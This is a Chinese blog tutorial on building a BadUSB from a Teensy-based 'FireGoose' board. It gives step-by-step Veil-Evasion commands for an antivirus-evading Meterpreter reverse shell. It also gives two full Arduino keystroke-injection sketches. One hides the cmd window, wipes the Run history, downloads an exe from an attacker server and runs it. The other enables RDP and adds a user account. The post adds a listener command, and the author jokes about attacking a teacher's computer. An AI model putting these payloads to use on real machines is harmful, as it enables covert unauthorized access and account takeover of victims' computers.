利用烧鹅制作简单BadUSB,插谁谁怀孕

所用硬件设备为烧鹅,烧鹅是RadioWar基于Teensy++ 2.0 AT90USB1286芯片设计的USB Rubber Ducky类开发板。 
使用veil编码meterpreter生成payload(经过编码的payload在杀软中仅能够存活几分钟),放到服务器上。插入烧鹅,模拟键盘输入,在cmd中下载payload,并执行。 

Github:https://github.com/RadioWar/FireGoose

0x1 利用veil编码打造免杀的meterpreter 

root@kali:~# veil-evasion          //启动veil 
[>] Please enter a command: list    //查看可选列表 
26) python/meterpreter/rev_tcp 

[>] Please enter a command: 26     //这里选择编号为26的payload 
[>] Please enter a command: set LHOST 192.168.31.233  //设置LHOST 

 

[>] Please enter a command: generate             //对payload进行编码 
[*] Press [enter] for 'payload' 
[>] Please enter the base name for output files: a   //输入生成的payload名字 
[>] Please enter the number of your choice: 1 //选择编码方式 

[*] Executable written to: /root/veil-output/compiled/a1.exe  //生成经过编码的payload位置 

0x2 将执行代码写入badusb中 

使用Arduino IDE 写入,其中下载使用的是PowerShell,如果使用vbs那种方法,360会报警

 

 1 void setup() {               //初始化,这里的代码只执行一次
 2 delay(5000);                //设置延时,让系统有足够的时间识别烧鹅,防止后续代码执行错乱。
 3 Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);                // 按下Win键
 4 Keyboard.set_key1(KEY_R);                                   // 同时按下R键
 5 Keyboard.send_now();                                       // 发送Win+R
 6 delay(100);
 7 Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");
 8 //开启极小的CMD窗口,设置文字和背景对比度尽可能相近,达到隐藏输入的目的
 9 Keyboard.set_key1(KEY_ENTER);
10 Keyboard.send_now();
11 delay(300);
12 Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f");                                           //利用注册表清除开始--运行的记录
13 Keyboard.set_key1(KEY_ENTER);
14 Keyboard.send_now();
15 Keyboard.println("powershell (new- object System.Net.WebClient).DownloadFile('http://192.168.1.100 /a1.exe','D:\\1.exe')");                              //下载远程的payload
16 Keyboard.set_key1(KEY_ENTER);
17 Keyboard.send_now();
18 Keyboard.set_modifier(0);
19 Keyboard.set_key1(0);
20 Keyboard.send_now();
21 delay(3000);                                               //设置延迟,等待下载完成
22 Keyboard.println("d:\\1.exe");                            //执行打开命令
23 Keyboard.set_key1(KEY_ENTER);
24 delay(300);
25 Keyboard.set_modifier(0);
26 Keyboard.set_key1(0);
27 Keyboard.set_modifier(MODIFIERKEY_ALT);
28 Keyboard.set_key1(KEY_SPACE);
29 Keyboard.set_key2(KEY_C);
30 Keyboard.send_now();
31 Keyboard.set_modifier(0);
32 Keyboard.set_key1(0);
33 Keyboard.set_key2(0);
34 Keyboard.send_now();                                       //关闭cmd窗口
35     }
36    void loop()                                           //循环,这里的代码无限循环
37     {
38     }

对于win7开启3389,并加帐户,使用

 1 void setup() {                                                 //初始化,这里的代码只执行一次
 2    delay(5000);                     //设置延时,让系统有足够的时间识别烧鹅,防止后续代码执行错乱。
 3    Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);                  // 按下Win键
 4    Keyboard.set_key1(KEY_R);                                      // 同时按下R键
 5    Keyboard.send_now();                                           // 发送Win+R
 6    delay(100);
 7    Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");
 8 //开启极小的CMD窗口,设置文字和背景对比度尽可能相近,达到隐藏输入的目的
 9    Keyboard.set_key1(KEY_ENTER);
10    Keyboard.send_now();
11    delay(300);
12    Keyboard.println("REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f");  //开启3389
13    Keyboard.set_key1(KEY_ENTER);
14    Keyboard.send_now();
15    Keyboard.println("net user 123 123 /add");        //添加帐户
16    Keyboard.set_modifier(0);
17    Keyboard.set_key1(0);
18    Keyboard.send_now();
19    delay(500);
20    Keyboard.set_modifier(0);
21    Keyboard.set_key1(0);
22    Keyboard.set_modifier(MODIFIERKEY_ALT);
23    Keyboard.set_key1(KEY_SPACE);
24    Keyboard.set_key2(KEY_C);
25    Keyboard.send_now();
26    Keyboard.set_modifier(0);
27    Keyboard.set_key1(0);
28    Keyboard.set_key2(0);
29    Keyboard.send_now();          //关闭cmd
30     }
31    void loop()                                                    //循环,这里的代码无限循环
32     {
33     }

在学校中利用3389比meterpreter更加好用。开启3389,杀软不会提示。添加帐户,360会提示,电脑管家不会提示。

对于执行修改dns等一些需要输入中文的地方,就比较麻烦了,暂时还没想到好的方法,只想到模拟键盘输入 Shift + Ctrl开启输入法....利用条件比较苛刻

0x3  等待目标连接 

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4444 E  //开始监听,等待连接 

将USB插入目标机器,执行相关命令 
目标机器上线 

 

PS:玩法还有很多,还可以开启目标机器3389,新建用户等等,快要期末考试了,不要拦着我,我要去插下老师的机器......

 

时间: 2024-11-03 01:56:08

利用烧鹅制作简单BadUSB,插谁谁怀孕的相关文章

利用PHP制作简单的内容采集器

采集器,通常又叫小偷程序,主要是用来抓取别人网页内容的.关于采集器的制作,其实并不难,就是远程打开要采集的网页,然后用正则表达式将需要的内容匹配出来,只要稍微有点正则表达式的基础,都能做出自己的采集器来的. 前几天做了个小说连载的程序,因为怕更新麻烦,顺带就写了个采集器,采集八路中文网的,功能比较简单,不能自定义规则,不过大概思路都在里面了,自定义规则可以自己来扩展. 用PHP来做采集器主要用到两个函数:file_get_contents()和preg_match_all(),前一个是远程读取网

利用PHP制作简单的内容采集器的代码_php技巧

采集器,通常又叫小偷程序,主要是用来抓取别人网页内容的.关于采集器的制作,其实并不难,就是远程打开要采集的网页,然后用正则表达式将需要的内容匹配出来,只要稍微有点正则表达式的基础,都能做出自己的采集器来的.  前几天做了个小说连载的程序,因为怕更新麻烦,顺带就写了个采集器,采集八路中文网的,功能比较简单,不能自定义规则,不过大概思路都在里面了,自定义规则可以自己来扩展.  用php来做采集器主要用到两个函数:file_get_contents()和preg_match_all(),前一个是远程读

利用PHP制作简单的内容采集器的原理分析_php技巧

前几天做了个小说连载的程序,因为怕更新麻烦,顺带就写了个采集器,采集八路中文网的,功能比较简单,不能自定义规则,不过大概思路都在里面了,自定义规则可以自己来扩展. 用php来做采集器主要用到两个函数:file_get_contents()和preg_match_all(),前一个是远程读取网页内容的,不过只在php5以上的版本才能用,后一个是正则函数,用来提取需要的内容的. 下面就一步一步来讲功能实现. 因为是采集小说,所以首先要将书名.作者.类型这三个提取出来,别的信息可根据需要提取. 这里以

利用Photoshop制作简单的水晶苹果壁纸教程

本教程介绍常见的水晶图形的制作方法.过程也比较简单,只需要按照光源方向设定高光和暗部区域即可.如果图形较为复杂,可以拆分来做,这样就容易很多. 最终效果   1.新建文档1280x1024像素,背景白色,新建图层填充黑色,添加图层样式.     2.新建图层,用钢笔画出苹果轮廓,填充黑色. 3.添加图层样式. 4.同样方法新建图层用钢笔画出叶子形状,填充黑色. 5.添加图层样式.   6.还是老办法画出黑色形状. 7.填充归零,添加图层样式. 8.同样方法,把填充归零,添加样式. 9.新建图层用

利用c#制作简单的留言板(1)

  留言板分三个模块:列出留言列表.显示详细内容.发表留言notepage.csnamespace notpage{using System;using System.Data.SQL ;using System.Data ;using System.Collections ; /// <summary>/// Summary description for notepage./// </summary> public class notepage{//私有变量 private i

PS利用滤镜制作简单的水墨字

来源:站酷 作者:Julien_z 前面有教程介绍过用画笔来制作水墨字,操作上繁琐一点,不过非常真实.用滤镜制作相对来说要快很多,只是层次感没有纯手工的强. 最终效果 1.新建大小适当的文档,背景可以加入一些纹理素材.然后输入所需文字,把文字图层复制一层,右键把文字栅格化图层或转换为智能对象. 2.执行:滤镜 > 模糊 > 高斯模糊,参数设置如下图. 3.执行:滤镜 > 扭曲 > 波浪,参数设置如下图. 4.如果是转换为智能对象的,青点击图层面板下方"添加图层蒙版&quo

利用JAVASCRIPT制作简单动画

javascript 如果你需要改变动画播放速度, 比如每5秒换一张图片 改变setTimeout("imgturn('" +numb+ "')", 1000)中的1000为5000 <html> <head> <title></title> <script language="javascript"> <!-- file://请先准备几张JPG图片格式的,名字是demo1.jpg

利用&amp;#106avascript制作简单动画

如果你需要改变动画播放速度, 比如每5秒换一张图片 改变setTimeout("imgturn('" +numb+ "')", 1000)中的1000为5000 <html> <head> <title></title> <script language="javascript"> <!-- //请先准备几张JPG图片格式的,名字是demo1.jpg,demo2.jpg,demo3

利用利用滤镜制作简单的烟雾曲线教程

最终效果   1.新建文档800x600像素,背景黑色,新建图层,2像素实心笔刷按shift键画一水平白色直线.     2.之后用6像素笔刷流量10%左右在刚才那个直线之上再画一下,产生外发光效果.   3.滤镜>扭曲>波浪. 4.我们会发现直线扭曲了.再次执行波浪滤镜,然后ctrl+shift+T渐隐,设置如下. 5.重复前2步骤,波长设置稍作改动,点随机化按钮几次. 6.我们会得到类似下图效果. 7.我们发现线条有点衰弱,我们复制几层. 8.背景做一个径向渐变. 9.把这除背景外的3个层